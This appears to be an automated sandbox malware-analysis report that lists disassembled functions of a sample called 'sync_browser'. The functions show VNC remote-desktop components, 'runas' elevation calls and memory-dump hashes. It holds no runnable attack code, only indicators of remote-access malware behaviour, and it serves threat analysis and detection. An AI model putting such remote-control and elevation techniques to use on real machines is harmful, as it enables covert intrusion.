Associated: 00000015.00000002.3450039940.00007FF7D5BAC000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ff7d5930000_sync_browser.jbxd

Yara matches

Similarity

API ID: _errno$_invalid_parameter_noinfofreemalloc
String ID:
API String ID: 3646291181-0
Opcode ID: 11c538c35a46a4fb5c0c73f141e54ae4a02d4c26eb65e23d1f675c1fad1344f9
Instruction ID: 268a7f833fba09f48a5b4cfee8955fc62a2ecab476de8fdb3aaebc606471bb9d
Opcode Fuzzy Hash: 11c538c35a46a4fb5c0c73f141e54ae4a02d4c26eb65e23d1f675c1fad1344f9
Instruction Fuzzy Hash: 6A516D22A0E6828BEB60BB25944036DA794EB45FACFD44633EE5D177C6DF3CE4418721

Function 00007FF7D59EAD6C Relevance: 13.6, APIs: 9, Instructions: 98COMMONLIBRARYCODE

Download Yara Rule

APIs

_lock.LIBCMT ref: 00007FF7D59EAD95

Part of subcall function 00007FF7D59F77D0: _amsg_exit.LIBCMT ref: 00007FF7D59F77FA

DecodePointer.KERNEL32(?,?,?,?,?,?,00000000,00007FF7D59EAF59,?,?,00000000,00007FF7D59F77FF), ref: 00007FF7D59EADC8
DecodePointer.KERNEL32(?,?,?,?,?,?,00000000,00007FF7D59EAF59,?,?,00000000,00007FF7D59F77FF), ref: 00007FF7D59EADE6
DecodePointer.KERNEL32(?,?,?,?,?,?,00000000,00007FF7D59EAF59,?,?,00000000,00007FF7D59F77FF), ref: 00007FF7D59EAE26
DecodePointer.KERNEL32(?,?,?,?,?,?,00000000,00007FF7D59EAF59,?,?,00000000,00007FF7D59F77FF), ref: 00007FF7D59EAE40
DecodePointer.KERNEL32(?,?,?,?,?,?,00000000,00007FF7D59EAF59,?,?,00000000,00007FF7D59F77FF), ref: 00007FF7D59EAE50
_initterm.LIBCMT ref: 00007FF7D59EAE90
_initterm.LIBCMT ref: 00007FF7D59EAEA3
ExitProcess.KERNEL32 ref: 00007FF7D59EAEDC

Memory Dump Source

Source File: 00000015.00000002.3449535165.00007FF7D5931000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7D5930000, based on PE: true

Associated: 00000015.00000002.3449495595.00007FF7D5930000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449669603.00007FF7D5A09000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449748846.00007FF7D5A3D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449835329.00007FF7D5A3F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449889957.00007FF7D5A40000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449889957.00007FF7D5A8B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449889957.00007FF7D5AB8000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3450039940.00007FF7D5AF1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3450039940.00007FF7D5B64000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3450039940.00007FF7D5BAC000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ff7d5930000_sync_browser.jbxd

Yara matches

Similarity

API ID: DecodePointer$_initterm$ExitProcess_amsg_exit_lock
String ID:
API String ID: 3873167975-0
Opcode ID: 8948cf76fc5cf68bd72f2600188bae6337740dc35318e5811e2f59e4f5aefda3
Instruction ID: 7ace3dcc67b7a4aa90e2fe3fa180212f7856aea6078b600711c2b091fb8ca791
Opcode Fuzzy Hash: 8948cf76fc5cf68bd72f2600188bae6337740dc35318e5811e2f59e4f5aefda3
Instruction Fuzzy Hash: 82418F61A1EA5283E654AB25F84453DEBA4BF88F88FC4003AED4D437A5EF3CE454C720

Function 00007FF7D5947AF0 Relevance: 13.5, APIs: 9, Instructions: 36fileCOMMONLIBRARYCODE

Download Yara Rule

APIs

CloseHandle.KERNEL32 ref: 00007FF7D5947B0E
CloseHandle.KERNEL32 ref: 00007FF7D5947B18
CloseHandle.KERNEL32 ref: 00007FF7D5947B22
CloseHandle.KERNEL32 ref: 00007FF7D5947B2C
UnmapViewOfFile.KERNEL32 ref: 00007FF7D5947B3B
UnmapViewOfFile.KERNEL32 ref: 00007FF7D5947B4A
CloseHandle.KERNEL32 ref: 00007FF7D5947B59
CloseHandle.KERNEL32 ref: 00007FF7D5947B68
DeleteCriticalSection.KERNEL32 ref: 00007FF7D5947B72

Memory Dump Source

Source File: 00000015.00000002.3449535165.00007FF7D5931000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7D5930000, based on PE: true

Associated: 00000015.00000002.3449495595.00007FF7D5930000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449669603.00007FF7D5A09000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449748846.00007FF7D5A3D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449835329.00007FF7D5A3F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449889957.00007FF7D5A40000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449889957.00007FF7D5A8B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449889957.00007FF7D5AB8000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3450039940.00007FF7D5AF1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3450039940.00007FF7D5B64000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3450039940.00007FF7D5BAC000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ff7d5930000_sync_browser.jbxd

Yara matches

Similarity

API ID: CloseHandle$FileUnmapView$CriticalDeleteSection
String ID:
API String ID: 4242051881-0
Opcode ID: 22161c178d6bb14c1052406e1d71c9eb4b4dcb4edfbb29f5cd716a860c71812c
Instruction ID: 9f0f805ddaef43326dcb405e8cddf60198c54d4986cebf5c47ed37ac4a1eaf6f
Opcode Fuzzy Hash: 22161c178d6bb14c1052406e1d71c9eb4b4dcb4edfbb29f5cd716a860c71812c
Instruction Fuzzy Hash: 4511DA26A16A1A8BEB08AF79D85497CA764FF84F08FC40032CD0E53268DF3CD845C360

Function 00007FF7D595593D Relevance: 12.5, APIs: 3, Strings: 4, Instructions: 201COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF7D59442A0: CreateThread.KERNEL32 ref: 00007FF7D5944336
Part of subcall function 00007FF7D59442A0: ResumeThread.KERNEL32 ref: 00007FF7D594434C

OpenInputDesktop.USER32 ref: 00007FF7D595407F
CloseDesktop.USER32 ref: 00007FF7D59540C2
GetTickCount.KERNEL32 ref: 00007FF7D59541B3

Part of subcall function 00007FF7D595C4E0: timeGetTime.WINMM ref: 00007FF7D595C52A
Part of subcall function 00007FF7D595C4E0: EnterCriticalSection.KERNEL32 ref: 00007FF7D595C551
Part of subcall function 00007FF7D595C4E0: RevertToSelf.ADVAPI32 ref: 00007FF7D595C56C
Part of subcall function 00007FF7D595C4E0: LeaveCriticalSection.KERNEL32 ref: 00007FF7D595C57C

Strings

vncservice.cpp : OpenInputdesktop2 NULL, xrefs: 00007FF7D5954060
vncclient.cpp : vncClientThread , xrefs: 00007FF7D5954029
vncservice.cpp : SelectDesktop , xrefs: 00007FF7D595404B
vncservice.cpp : OpenInputdesktop2 OK, xrefs: 00007FF7D595409A

Memory Dump Source

Source File: 00000015.00000002.3449535165.00007FF7D5931000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7D5930000, based on PE: true

Associated: 00000015.00000002.3449495595.00007FF7D5930000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449669603.00007FF7D5A09000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449748846.00007FF7D5A3D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449835329.00007FF7D5A3F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449889957.00007FF7D5A40000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449889957.00007FF7D5A8B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449889957.00007FF7D5AB8000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3450039940.00007FF7D5AF1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3450039940.00007FF7D5B64000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3450039940.00007FF7D5BAC000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ff7d5930000_sync_browser.jbxd

Yara matches

Similarity

API ID: CriticalDesktopSectionThread$CloseCountCreateEnterInputLeaveOpenResumeRevertSelfTickTimetime
String ID: vncclient.cpp : vncClientThread $vncservice.cpp : OpenInputdesktop2 NULL$vncservice.cpp : OpenInputdesktop2 OK$vncservice.cpp : SelectDesktop
API String ID: 186452611-3977938048
Opcode ID: 240a7e3f24338c8b8522c66d0c22f1fbf1c168c0c99ca4f370a1211a49b204dc
Instruction ID: 879cb93dd766b9892349d648551be0ea97dc167b2eb8ac6a913df743af6390e8
Opcode Fuzzy Hash: 240a7e3f24338c8b8522c66d0c22f1fbf1c168c0c99ca4f370a1211a49b204dc
Instruction Fuzzy Hash: A5A1B022A0869186FB94EB25C4587FEABA1EB85F88FD84033DE4C477A5CF39D455C720

Function 00007FF7D595BD70 Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 189memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 00007FF7D59EA220: _errno.LIBCMT ref: 00007FF7D59EA168
Part of subcall function 00007FF7D59EA220: _invalid_parameter_noinfo.LIBCMT ref: 00007FF7D59EA173

GetTempPathA.KERNEL32 ref: 00007FF7D595BDFD
sprintf.LIBCMT ref: 00007FF7D595BF6C

Part of subcall function 00007FF7D59E7C50: _errno.LIBCMT ref: 00007FF7D59E7C88
Part of subcall function 00007FF7D59E7C50: _invalid_parameter_noinfo.LIBCMT ref: 00007FF7D59E7C93

GlobalAlloc.KERNEL32 ref: 00007FF7D595BFFF

Strings

%s%s%s%s, xrefs: 00007FF7D595BF5E
!UVNCDIR-, xrefs: 00007FF7D595BF50
\*.*, xrefs: 00007FF7D595BFDC
.zip, xrefs: 00007FF7D595BF3B

Memory Dump Source

Source File: 00000015.00000002.3449535165.00007FF7D5931000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7D5930000, based on PE: true

Associated: 00000015.00000002.3449495595.00007FF7D5930000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449669603.00007FF7D5A09000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449748846.00007FF7D5A3D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449835329.00007FF7D5A3F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449889957.00007FF7D5A40000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449889957.00007FF7D5A8B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449889957.00007FF7D5AB8000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3450039940.00007FF7D5AF1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3450039940.00007FF7D5B64000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3450039940.00007FF7D5BAC000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ff7d5930000_sync_browser.jbxd

Yara matches

Similarity

API ID: _errno_invalid_parameter_noinfo$AllocGlobalPathTempsprintf
String ID: !UVNCDIR-$%s%s%s%s$.zip$\*.*
API String ID: 3897446562-3886131270
Opcode ID: 2256e7430c5e0a02bc82ce3aebf4d27e46064ed5cf51e837b8b2d61e65df44cc
Instruction ID: b7b27cbaed7d4ea624f6af2142bb38041bc8b34f7ef75a5acec442bbbcefc25d
Opcode Fuzzy Hash: 2256e7430c5e0a02bc82ce3aebf4d27e46064ed5cf51e837b8b2d61e65df44cc
Instruction Fuzzy Hash: 65818C22608B859AEB10DB34D4003EDA761FB45BA8FD04333EA6D17AD9DF78D556C720

Function 00007FF7D5949260 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 83libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetVersionExA.KERNEL32 ref: 00007FF7D59492B8
GetVersionExA.KERNEL32 ref: 00007FF7D59492CF
GetModuleHandleA.KERNEL32 ref: 00007FF7D59492F8
GetProcAddress.KERNEL32 ref: 00007FF7D5949308
GetSystemInfo.KERNEL32 ref: 00007FF7D594931C

Strings

kernel32.dll, xrefs: 00007FF7D59492F1
GetNativeSystemInfo, xrefs: 00007FF7D59492FE

Memory Dump Source

Source File: 00000015.00000002.3449535165.00007FF7D5931000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7D5930000, based on PE: true

Associated: 00000015.00000002.3449495595.00007FF7D5930000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449669603.00007FF7D5A09000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449748846.00007FF7D5A3D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449835329.00007FF7D5A3F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449889957.00007FF7D5A40000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449889957.00007FF7D5A8B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449889957.00007FF7D5AB8000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3450039940.00007FF7D5AF1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3450039940.00007FF7D5B64000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3450039940.00007FF7D5BAC000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ff7d5930000_sync_browser.jbxd

Yara matches

Similarity

API ID: Version$AddressHandleInfoModuleProcSystem
String ID: GetNativeSystemInfo$kernel32.dll
API String ID: 335284197-192647395
Opcode ID: bd6ae27e489f82f31fcc2b20e4ae8107fd534e528a9ba4d17229ed8c41967507
Instruction ID: 4f7c418336ee5b43ebef4a925f373372e88602587ac5f9624eaa6b71ee11046c
Opcode Fuzzy Hash: bd6ae27e489f82f31fcc2b20e4ae8107fd534e528a9ba4d17229ed8c41967507
Instruction Fuzzy Hash: C6312E21A1C58287FA74A724F45577EB3A0FB89F08FC00036E98D86A89EF7CD4458B10

Function 00007FF7D59600F0 Relevance: 12.3, APIs: 3, Strings: 4, Instructions: 64COMMON

Download Yara Rule

APIs

GetDeviceCaps.GDI32 ref: 00007FF7D5960113
GetDeviceCaps.GDI32 ref: 00007FF7D5960140
GetDeviceCaps.GDI32 ref: 00007FF7D596016D

Part of subcall function 00007FF7D593A040: OpenInputDesktop.USER32(?,?,?,00007FF7D59382D7), ref: 00007FF7D593A07A
Part of subcall function 00007FF7D593A040: GetCurrentThreadId.KERNEL32 ref: 00007FF7D593A083
Part of subcall function 00007FF7D593A040: GetThreadDesktop.USER32(?,?,?,00007FF7D59382D7), ref: 00007FF7D593A08B
Part of subcall function 00007FF7D593A040: SetThreadDesktop.USER32(?,?,?,00007FF7D59382D7), ref: 00007FF7D593A0A6
Part of subcall function 00007FF7D593A040: MessageBoxA.USER32 ref: 00007FF7D593A0B7
Part of subcall function 00007FF7D593A040: SetThreadDesktop.USER32(?,?,?,00007FF7D59382D7), ref: 00007FF7D593A0C2
Part of subcall function 00007FF7D593A040: CloseDesktop.USER32(?,?,?,00007FF7D59382D7), ref: 00007FF7D593A0CB

Strings

vncdesktop.cpp : DBG:display context has %d planes!, xrefs: 00007FF7D5960119
WinVNC, xrefs: 00007FF7D5960178
vncDesktop : current display is PLANAR, not CHUNKY!WinVNC cannot be used with this graphics device driver, xrefs: 00007FF7D596017F
vncdesktop.cpp : DBG:memory context has %d planes!, xrefs: 00007FF7D5960146

Memory Dump Source

Source File: 00000015.00000002.3449535165.00007FF7D5931000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7D5930000, based on PE: true

Associated: 00000015.00000002.3449495595.00007FF7D5930000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449669603.00007FF7D5A09000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449748846.00007FF7D5A3D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449835329.00007FF7D5A3F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449889957.00007FF7D5A40000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449889957.00007FF7D5A8B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449889957.00007FF7D5AB8000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3450039940.00007FF7D5AF1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3450039940.00007FF7D5B64000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3450039940.00007FF7D5BAC000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ff7d5930000_sync_browser.jbxd

Yara matches

Similarity

API ID: Desktop$Thread$CapsDevice$CloseCurrentInputMessageOpen
String ID: WinVNC$vncDesktop : current display is PLANAR, not CHUNKY!WinVNC cannot be used with this graphics device driver$vncdesktop.cpp : DBG:display context has %d planes!$vncdesktop.cpp : DBG:memory context has %d planes!
API String ID: 3271485511-23260621
Opcode ID: aceaff558d4e77a2f2eec4c4dc82cdcf6baf6394409946313555329e23b774f0
Instruction ID: 661ca314e27640c0085a413792ccac806ca3116647fa676d2ad9d075e50bfa54
Opcode Fuzzy Hash: aceaff558d4e77a2f2eec4c4dc82cdcf6baf6394409946313555329e23b774f0
Instruction Fuzzy Hash: 8E218E726181E686E704AFB5C400BE86B51EFA9F08FC80437CD8C9A699DE7C9145C331

Function 00007FF7D5943E20 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 32COMMON

Download Yara Rule

APIs

GetVersionExA.KERNEL32 ref: 00007FF7D5943E4C
GetModuleFileNameA.KERNEL32 ref: 00007FF7D5943E6C
GetForegroundWindow.USER32 ref: 00007FF7D5943E7B
ShellExecuteExA.SHELL32 ref: 00007FF7D5943ECA

Strings

p, xrefs: 00007FF7D5943E72
-softwarecad, xrefs: 00007FF7D5943EAD
runas, xrefs: 00007FF7D5943E86

Memory Dump Source

Source File: 00000015.00000002.3449535165.00007FF7D5931000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7D5930000, based on PE: true

Associated: 00000015.00000002.3449495595.00007FF7D5930000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449669603.00007FF7D5A09000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449748846.00007FF7D5A3D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449835329.00007FF7D5A3F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449889957.00007FF7D5A40000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449889957.00007FF7D5A8B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449889957.00007FF7D5AB8000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3450039940.00007FF7D5AF1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3450039940.00007FF7D5B64000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3450039940.00007FF7D5BAC000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ff7d5930000_sync_browser.jbxd

Yara matches

Similarity

API ID: ExecuteFileForegroundModuleNameShellVersionWindow
String ID: -softwarecad$p$runas
API String ID: 397093096-2208381721
Opcode ID: fb4efa84501b81446d58e4aa4c9b0a5607d51e55c45e595c5f15ef2dbf94494a
Instruction ID: 340ff3fca386dc545195e497fcfb24ee37476b7f1950581cb160840b79e004cf
Opcode Fuzzy Hash: fb4efa84501b81446d58e4aa4c9b0a5607d51e55c45e595c5f15ef2dbf94494a
Instruction Fuzzy Hash: CB11A836519B8186E764AB20F49979EB7A4FBC8B48FC00236DA8D06B58DF7CD158CB10

Function 00007FF7D5943D50 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 32COMMON

Download Yara Rule

APIs

GetVersionExA.KERNEL32 ref: 00007FF7D5943D7C
GetModuleFileNameA.KERNEL32 ref: 00007FF7D5943D9C
GetForegroundWindow.USER32 ref: 00007FF7D5943DAB
ShellExecuteExA.SHELL32 ref: 00007FF7D5943DFA

Strings

p, xrefs: 00007FF7D5943DA2
-delsoftwarecad, xrefs: 00007FF7D5943DDD
runas, xrefs: 00007FF7D5943DB6

Memory Dump Source

Source File: 00000015.00000002.3449535165.00007FF7D5931000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7D5930000, based on PE: true

Associated: 00000015.00000002.3449495595.00007FF7D5930000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449669603.00007FF7D5A09000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449748846.00007FF7D5A3D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449835329.00007FF7D5A3F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449889957.00007FF7D5A40000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449889957.00007FF7D5A8B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449889957.00007FF7D5AB8000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3450039940.00007FF7D5AF1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3450039940.00007FF7D5B64000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3450039940.00007FF7D5BAC000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ff7d5930000_sync_browser.jbxd

Yara matches

Similarity

API ID: ExecuteFileForegroundModuleNameShellVersionWindow
String ID: -delsoftwarecad$p$runas
API String ID: 397093096-3343046257
Opcode ID: 2d9c0c578c979013a183638fe42de72fccd76df398e534bf6a744ea15e2cbb9d
Instruction ID: 311c83828b22e4b11ca67aa5d23ba2ce5c662b9a68f42e37eb9613292303e0fd
Opcode Fuzzy Hash: 2d9c0c578c979013a183638fe42de72fccd76df398e534bf6a744ea15e2cbb9d
Instruction Fuzzy Hash: 5511E836519B8186E764AB20F49879EB7A4FBC8B48FC00236DA8D02B58DF7CD158CB50

Function 00007FF7D59F76E8 Relevance: 12.1, APIs: 8, Instructions: 59COMMONLIBRARYCODE

Download Yara Rule

APIs

_FF_MSGBANNER.LIBCMT ref: 00007FF7D59F770F

Part of subcall function 00007FF7D59F2ED0: _set_error_mode.LIBCMT ref: 00007FF7D59F2ED9
Part of subcall function 00007FF7D59F2ED0: _set_error_mode.LIBCMT ref: 00007FF7D59F2EE8

Part of subcall function 00007FF7D59F2C70: _set_error_mode.LIBCMT ref: 00007FF7D59F2CB5
Part of subcall function 00007FF7D59F2C70: _set_error_mode.LIBCMT ref: 00007FF7D59F2CC6
Part of subcall function 00007FF7D59F2C70: GetModuleFileNameW.KERNEL32 ref: 00007FF7D59F2D28

Part of subcall function 00007FF7D59EABD8: ExitProcess.KERNEL32 ref: 00007FF7D59EABE7

Part of subcall function 00007FF7D59F326C: malloc.LIBCMT ref: 00007FF7D59F3297
Part of subcall function 00007FF7D59F326C: Sleep.KERNEL32(?,?,?,00007FF7D59F7749,?,?,?,00007FF7D59F77F3), ref: 00007FF7D59F32AA

_errno.LIBCMT ref: 00007FF7D59F7751
_lock.LIBCMT ref: 00007FF7D59F7765
InitializeCriticalSectionAndSpinCount.KERNEL32(?,?,?,00007FF7D59F77F3), ref: 00007FF7D59F777B
free.LIBCMT ref: 00007FF7D59F7788
_errno.LIBCMT ref: 00007FF7D59F778D
LeaveCriticalSection.KERNEL32(?,?,?,00007FF7D59F77F3), ref: 00007FF7D59F77B0

Memory Dump Source

Source File: 00000015.00000002.3449535165.00007FF7D5931000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7D5930000, based on PE: true

Associated: 00000015.00000002.3449495595.00007FF7D5930000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449669603.00007FF7D5A09000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449748846.00007FF7D5A3D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449835329.00007FF7D5A3F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449889957.00007FF7D5A40000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449889957.00007FF7D5A8B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449889957.00007FF7D5AB8000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3450039940.00007FF7D5AF1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3450039940.00007FF7D5B64000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3450039940.00007FF7D5BAC000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ff7d5930000_sync_browser.jbxd

Yara matches

Similarity

API ID: _set_error_mode$CriticalSection_errno$CountExitFileInitializeLeaveModuleNameProcessSleepSpin_lockfreemalloc
String ID:
API String ID: 113790786-0
Opcode ID: ab297a067351a709e4edac81291c778a22c0a59f8ebf175c2e86f69f3e49f6c1
Instruction ID: ed9939470b6d17206e51eacdb5e3e7e21a237f351ce69544c5c055602d7cc3ce
Opcode Fuzzy Hash: ab297a067351a709e4edac81291c778a22c0a59f8ebf175c2e86f69f3e49f6c1
Instruction Fuzzy Hash: 41215921E2D64283F6647B60A80477EB294AF81F98FD84437ED4E466D5CF3CE8408770

Function 00007FF7D59F9A94 Relevance: 10.7, APIs: 2, Strings: 4, Instructions: 240COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00007FF7D59F37C4: GetLastError.KERNEL32(?,?,?,00007FF7D59EFFD1,?,?,?,?,00007FF7D59E8C19,?,?,?,00007FF7D59E748C), ref: 00007FF7D59F37CE
Part of subcall function 00007FF7D59F37C4: FlsGetValue.KERNEL32(?,?,?,00007FF7D59EFFD1,?,?,?,?,00007FF7D59E8C19,?,?,?,00007FF7D59E748C), ref: 00007FF7D59F37DC
Part of subcall function 00007FF7D59F37C4: FlsSetValue.KERNEL32(?,?,?,00007FF7D59EFFD1,?,?,?,?,00007FF7D59E8C19,?,?,?,00007FF7D59E748C), ref: 00007FF7D59F3808
Part of subcall function 00007FF7D59F37C4: GetCurrentThreadId.KERNEL32 ref: 00007FF7D59F381C
Part of subcall function 00007FF7D59F37C4: SetLastError.KERNEL32(?,?,?,00007FF7D59EFFD1,?,?,?,?,00007FF7D59E8C19,?,?,?,00007FF7D59E748C), ref: 00007FF7D59F3834

Part of subcall function 00007FF7D59F32EC: Sleep.KERNEL32(?,?,?,00007FF7D59F37F7,?,?,?,00007FF7D59EFFD1,?,?,?,?,00007FF7D59E8C19), ref: 00007FF7D59F3331

_errno.LIBCMT ref: 00007FF7D59F9D9C
_invalid_parameter_noinfo.LIBCMT ref: 00007FF7D59F9DA7

Strings

JanFebMarAprMayJunJulAugSepOctNovDec, xrefs: 00007FF7D59F9BF4
gfff, xrefs: 00007FF7D59F9C4C
;, xrefs: 00007FF7D59F9B46
;, xrefs: 00007FF7D59F9B33

Memory Dump Source

Source File: 00000015.00000002.3449535165.00007FF7D5931000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7D5930000, based on PE: true

Associated: 00000015.00000002.3449495595.00007FF7D5930000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449669603.00007FF7D5A09000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449748846.00007FF7D5A3D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449835329.00007FF7D5A3F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449889957.00007FF7D5A40000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449889957.00007FF7D5A8B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449889957.00007FF7D5AB8000.00000004.00000001.01000000.00000007.sdmpDownload File
